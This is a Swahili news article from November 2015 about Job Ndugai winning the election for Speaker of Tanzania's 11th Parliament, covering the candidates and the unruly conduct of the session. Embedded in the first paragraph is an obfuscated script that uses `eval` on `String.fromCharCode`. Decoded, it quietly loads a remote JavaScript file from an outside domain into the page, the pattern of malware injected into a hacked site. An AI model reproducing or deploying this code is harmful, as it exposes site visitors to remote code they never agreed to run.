Recent Comments

Sakata la Kumtafuta Spika wa Bungu, 2015

By NaMwandishiWetu Nov 17, 2015
<p>Bunge la Jamhuri la Muungano wa Tanzania, Spika akiingia. Mwaka huu wanatafuta spika mpya wa bunge jipya.</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

 

Bunge la Jamhuri la Muungano wa Tanzania, Spika akiingia. Mwaka huu wanatafuta spika mpya wa bunge jipya.
Bunge la Jamhuri la Muungano wa Tanzania, Spika akiingia. Mwaka huu wanatafuta spika mpya wa bunge jipya.

 

 

 

Ndugai ndiye Spika mpya wa Bunge la Tanzania Akabiliwa na changamoto kubwa MBUNGE wa CCM wa jimbo la Kongwa, Bw. Jobu Ndugai, amechaguliwa kuwa spika wa Bunge la 11 la Jamhuri ya Muungano wa Tanzania.

Katika uchaguzi huo uliofanyika leo mjini Dodoma, Bw. Ndugai amewabwaga wagombea wenzake kwa kupata asilimia 70 ya kura zilizopigwa.
Jumla ya watu wanane waliomba kuwania nafasi hiyo ya uspika. Wagombea hao na vyama vyao kwenye mabano ni, Jobu Ndugai (CCM), Goodluck Ole Medeye (CHADEMA), Richard Lyimo (TLP), Robert Kisimini (DP), Godfrey Malisa (CCK), Hassan Almas (NRA), Peter Sarungi (AFP). Mwingine ni Hashim Rungwe (CHAUMA) ambaye hata hivyo hakufika bungeni kujinadi na kuomba kura.
Mwenyekiti wa uchaguzi huo, Bw. Andrew Chenge aliwaeleza wabunge kuwa hana taarifa yoyote kuhusu kutofika kwa Bw. Rungwe.
Akifafanua juu ya hilo, katibu wa bunge alisema Bw. Rungwe alithibitisha kuwa angefika lakini akaonyesha kushangazwa kwake na kitendo cha kutoonekana. Hata hivyo katibu aliwaomba wabunge kulipigia kura jina la Bw, Rungwe. Rungwe alikuwa mmoja wa wagombea kiti cha urais wa Jamhuri ya Muungano wa Tanzania katika uchaguzi uliofanyika Oktoba 25 mwaka huu.
Makapi ya bunge lililopita yajitokeza Kinyume na matarajio ya Watanzania wengi kwamba bunge jipya lingekuwa tofauti, makapi ya bunge lililopita ikiwemo tabia mbaya ya kuzomea, kutotii amri pamoja na tatizo la wabunge kufungamana na itikadi, vimejitokeza katika uchaguzi wa leo.
Mapungufu hayo yalionekana zaidi kupitia maswali waliyoulizwa wagombea ambayo yalionyesha dhahiri kulenga kuwabomoa kisiasa badala ya kuwapa nafasi kueleza sifa zao na uwezo wao katika uongozi.
Miongoni mwa maswali hayo ni lile aliloulizwa mgombea wa TLP, Bw. Richard Lyimo, aliulizwa kama yeye hatakuwa spika mzigo kama viongozi wengi wa chama chake walivyo.
Mgombea mwingine aliyekumbana na swali kombora ni Bw. Ole Medeye wa CHADEMA aliyeulizwa kama iwapo atachaguliwa kuwa spika hataendeleza tabia za ubaguzi ambazo tayari ameshazionyesha katika bunge lililopita.
Bunge latakiwa kurejesha heshima yake iliyopotea
Licha ya wagombea kueleza mipango yao iwapo watapata nafasi hiyo ya uspika, wengi walionyesha dhahiri kwamba kiongozi mpya wa bunge anatakiwa arejeshe heshima ya bunge la Jamhuri ya Muungano wa Tanzania ambayo wanasema imepotea.
Wanasema katika bunge lililopita wabunge walifanya mambo ya aibu kama kukumbaba, kumzomea spika, kuzomeana wao kwa wao, kubeba mabango ya vyama vyao badala ya kuweka utaifa mbele , vitu vilivyoshusha heshima ya chombo hicho.
Spika mpya ana changamoto kubwa
Wabunge wengi wakiopata nafasi ya kuwauliza wabunge maswali walionyesha dhahiri kwamba spika wa bunge la 11 atakuwa na changamoto kubwa kufuatia wengi wa wabunge kuwa vijana, wasomi na wanaotaka mabadiliko makubwa badala ya blabla za kisiasa.